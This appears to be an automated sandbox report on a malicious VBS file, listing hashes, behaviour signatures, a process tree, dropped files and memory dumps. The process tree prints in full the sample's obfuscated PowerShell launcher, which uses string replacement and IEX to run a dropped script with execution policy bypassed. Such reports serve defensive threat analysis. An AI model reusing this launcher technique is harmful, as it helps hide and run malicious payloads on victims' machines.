8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72

General

Target

8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72.vbs
Size

2KB
MD5

76d64bdec97716fc5db19bf4d9fd3255
SHA1

35f62e6cc17c8bc982db07c556216d98fd600c02
SHA256

8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72
SHA512

d38a1e31a96267bb7706b4e072c6c383bb26eb2e065b0b6e5b6c178ac87cc0115d2a2f88ec5ab71a93364197e1eefff0e3c3cb87a50b636607e2026b962c90f9

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

576 powershell.exe
432 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 576 powershell.exe
Token: SeDebugPrivilege 432 powershell.exe

pid	process
576	powershell.exe
432	powershell.exe

description	pid	process
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1584 wrote to memory of 576	1584	WScript.exe	powershell.exe
PID 1584 wrote to memory of 576	1584	WScript.exe	powershell.exe
PID 1584 wrote to memory of 576	1584	WScript.exe	powershell.exe
PID 576 wrote to memory of 432	576	powershell.exe	powershell.exe
PID 576 wrote to memory of 432	576	powershell.exe	powershell.exe
PID 576 wrote to memory of 432	576	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6f0a119748f9cb9a15d38c3a5e16fa52

SHA1
96f3563353ab0584145c3e79db767efa3ccb4a50

SHA256
f649a822c51690074a9fd4af58a1294eb7516fe399633e147b0efae3ca33a5cb

SHA512
7b17fb1fcca2b2b2071ffe4b212e31e8dc2e3e93ce77b0debc6fa61d5e35b9125f41551633ef388c5792a23da812f8cf1435e05be03ab9e1d86e25f6bd9c4b9f

Download Submit
C:\Users\Public\Downloads\HBar.ps1
MD5
b1da375f7fc47b6e7f441a44b1925371

SHA1
336132bf0096ad8fa877cf25978e9bb2b911554e

SHA256
51b7e07f22110272589c03f523256f454274605cc41ed5847448b9c0bf62e4bd

SHA512
d9861c341b1ae91647d51053b93291ca5862de418a5a42ac56c765e19abb7cf9f5c29bc6e72c1789c3921481f13a0498c1d329dbc68a39c8d8db5b59652f7248

Download Submit
memory/432-69-0x0000000002442000-0x0000000002444000-memory.dmp

Filesize
8KB

Download
memory/432-66-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp

Filesize
11.4MB

Download
memory/432-73-0x000000000244B000-0x000000000246A000-memory.dmp

Filesize
124KB

Download
memory/432-71-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/432-70-0x0000000002444000-0x0000000002447000-memory.dmp

Filesize
12KB

Download
memory/432-63-0x0000000000000000-mapping.dmp

Download
memory/432-68-0x0000000002440000-0x0000000002442000-memory.dmp

Filesize
8KB

Download
memory/576-62-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/576-67-0x000000000272B000-0x000000000274A000-memory.dmp

Filesize
124KB

Download
memory/576-59-0x0000000002720000-0x0000000002722000-memory.dmp

Filesize
8KB

Download
memory/576-60-0x0000000002722000-0x0000000002724000-memory.dmp

Filesize
8KB

Download
memory/576-58-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp

Filesize
11.4MB

Download
memory/576-56-0x0000000000000000-mapping.dmp

Download
memory/576-61-0x0000000002724000-0x0000000002727000-memory.dmp

Filesize
12KB

Download
memory/1584-55-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing